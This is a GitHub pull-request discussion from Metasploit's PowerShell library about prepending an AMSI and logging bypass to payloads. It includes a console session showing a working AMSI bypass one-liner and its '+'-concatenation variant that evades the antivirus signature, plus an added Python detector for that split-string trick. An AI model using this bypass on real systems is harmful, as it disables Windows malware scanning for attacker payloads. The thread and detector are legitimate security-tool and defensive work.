
Integrate PowerShell Protections Bypass #17

Merged
merged 5 commits into from Apr 22, 2019

Conversation

@phra (Contributor) commented Jan 19, 2019

Will fix rapid7/metasploit-framework#11283

@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019
@bwatters-r7 (Contributor) commented Feb 14, 2019

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?


@phra (Contributor, Author) commented Feb 14, 2019

@bwatters-r7 just try any PowerShell payloads on an updated Win 10 machine with AMSI.


phra and others added 4 commits Feb 17, 2019
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra (Contributor, Author) commented Apr 15, 2019


@timwr (Contributor) commented Apr 16, 2019

Very interesting, thanks @phra


@timwr (Contributor) commented Apr 22, 2019

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

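The session above shows the AMSI signature matching the literal names but not the '+'-split form. As an added example (not code from this PR or from Rex::Powershell), the following defender-side check folds '+'-joined string literals in script block text before matching the indicator names, so a split like 'Ams'+'iUtils' no longer hides them; the sample script blocks are constructed from the session on this page, not real logs.

```python
import re

# Constructed samples modelled on the session above (Event ID 4104 ScriptBlockText style), not real logs.
SAMPLE_SCRIPT_BLOCKS = [
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
    "$Ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);",
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');"
    "$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);",
    "Get-ChildItem -Path ('C:\\Users\\' + $env:USERNAME)",  # benign '+' concatenation
]

# Names the session shows the AMSI signature keying on; matched case-insensitively.
INDICATORS = ("amsiutils", "amsiinitfailed")

# Two adjacent string literals joined by '+'. Does not handle doubled quotes
# ('it''s') or the -join/-f operators; those need a real tokenizer.
CONCAT_RE = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def fold_concatenation(text):
    """Join '+'-concatenated literals until nothing changes (handles chains of 3+)."""
    prev = None
    while prev != text:
        prev = text
        text = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
    return text


def classify(script_block):
    """Return matched indicators and whether they were only visible after folding."""
    raw = script_block.lower()
    folded = fold_concatenation(script_block).lower()
    hits = [name for name in INDICATORS if name in folded]
    if not hits:
        return None
    # split_strings is True when the raw text hid an indicator that folding exposed.
    return {"indicators": hits, "split_strings": any(name not in raw for name in hits)}


if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(classify(block), "<-", block[:60])
```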

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019
1 check passed
@timwr (Contributor) commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.


@phra (Contributor, Author) commented Apr 23, 2019

I didn't expect the '+' to work so well:


It would be nice to have the strings obfuscated dynamically, but this will do for now.

Empire includes https://github.com/danielbohannon/Invoke-Obfuscation, but it depends on PowerShell, and that means adding it as an optional(?) dependency or embedding it directly within the project with a ~50 MB overhead of stuff.

Writing a simpler, similar project in Ruby may be overkill.

Any idea?


@0xVIC commented Apr 23, 2019

@phra phra deleted the feat/psh-protections-bypass branch Apr 23, 2019
@phra (Contributor, Author) commented May 1, 2019

Was the prepend_protections_bypass option defined somewhere?

I don't see the setting available yet with Framework Version: 5.0.19-dev.


@timwr (Contributor) commented May 10, 2019

@phra apologies, I didn't send a PR with that part; I think I tested with this commit: timwr/metasploit-framework@a0d6bcd


@phra (Contributor, Author) commented May 10, 2019

Oh ok, I hope it will be merged into master soon!
Regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as the target.


@phra (Contributor, Author) commented Jul 21, 2019

Any update? I still cannot easily add the AMSI bypass to PowerShell payloads.


@phra (Contributor, Author) commented Oct 10, 2019

@timwr any update on this?


@timwr (Contributor) commented Oct 11, 2019

@phra did you test the commit I posted above? timwr/metasploit-framework@a0d6bcd
Maybe you can send a PR to the framework repository that enables it for web_delivery?


phra added a commit to phra/metasploit-framework that referenced this issue Oct 12, 2019
phra added a commit to phra/metasploit-framework that referenced this issue Oct 12, 2019
@phra (Contributor, Author) commented Oct 12, 2019

maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see rapid7/metasploit-framework#12446


4 participants